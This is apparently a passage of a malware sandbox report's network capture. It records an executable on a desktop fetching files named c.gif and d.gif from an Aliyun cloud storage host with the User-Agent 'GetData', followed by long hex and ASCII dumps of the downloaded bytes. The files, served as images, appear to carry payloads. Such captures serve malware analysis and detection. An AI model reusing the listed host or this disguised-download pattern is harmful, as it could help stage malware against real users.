                        2025-01-05 09:05:32 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                        Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                        2025-01-05 09:05:32 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                        Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                        2025-01-05 09:05:32 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                        Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                        2025-01-05 09:05:32 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                        Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                        2025-01-05 09:05:32 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                        Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                        2025-01-05 09:05:32 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                        Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                        2025-01-05 09:05:32 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                        Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                        2025-01-05 09:05:32 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                        Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.74997139.103.20.344436952C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        TimestampBytes transferredDirectionData
                        2025-01-05 09:05:34 UTC111OUTGET /c.gif HTTP/1.1
                        User-Agent: GetData
                        Host: msd1sq.oss-cn-beijing.aliyuncs.com
                        Cache-Control: no-cache
                        2025-01-05 09:05:34 UTC545INHTTP/1.1 200 OK
                        Server: AliyunOSS
                        Date: Sun, 05 Jan 2025 09:05:34 GMT
                        Content-Type: image/gif
                        Content-Length: 10681
                        Connection: close
                        x-oss-request-id: 677A4B5E35EB26393151333F
                        Accept-Ranges: bytes
                        ETag: "10A818386411EE834D99AE6B7B68BE71"
                        Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                        x-oss-object-type: Normal
                        x-oss-hash-crc64ecma: 10287299869673359293
                        x-oss-storage-class: Standard
                        x-oss-ec: 0048-00000104
                        Content-Disposition: attachment
                        x-oss-force-download: true
                        Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                        x-oss-server-time: 3
                        2025-01-05 09:05:34 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                        2025-01-05 09:05:34 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                        Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                        2025-01-05 09:05:34 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                        Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.74997239.103.20.344436952C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        TimestampBytes transferredDirectionData
                        2025-01-05 09:05:35 UTC111OUTGET /d.gif HTTP/1.1
                        User-Agent: GetData
                        Host: msd1sq.oss-cn-beijing.aliyuncs.com
                        Cache-Control: no-cache
                        2025-01-05 09:05:36 UTC546INHTTP/1.1 200 OK
                        Server: AliyunOSS
                        Date: Sun, 05 Jan 2025 09:05:36 GMT
                        Content-Type: image/gif
                        Content-Length: 3892010
                        Connection: close
                        x-oss-request-id: 677A4B5F2A05773138914B72
                        Accept-Ranges: bytes
                        ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                        Last-Modified: Sat, 04 Jan 2025 09:22:53 GMT
                        x-oss-object-type: Normal
                        x-oss-hash-crc64ecma: 3363616613234190325
                        x-oss-storage-class: Standard
                        x-oss-ec: 0048-00000104
                        Content-Disposition: attachment
                        x-oss-force-download: true
                        Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                        x-oss-server-time: 2
                        2025-01-05 09:05:36 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                        2025-01-05 09:05:36 UTC4096INData Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f
                        Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|o
                        2025-01-05 09:05:36 UTC4096INData Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11
                        Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                        2025-01-05 09:05:36 UTC4096INData Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97
                        Data Ascii: -J;wuwu{}uG`uWu{Q6
                        2025-01-05 09:05:36 UTC4096INData Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79
                        Data Ascii: w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
                        2025-01-05 09:05:36 UTC4096INData Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85
                        Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                        2025-01-05 09:05:36 UTC4096INData Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3
                        Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
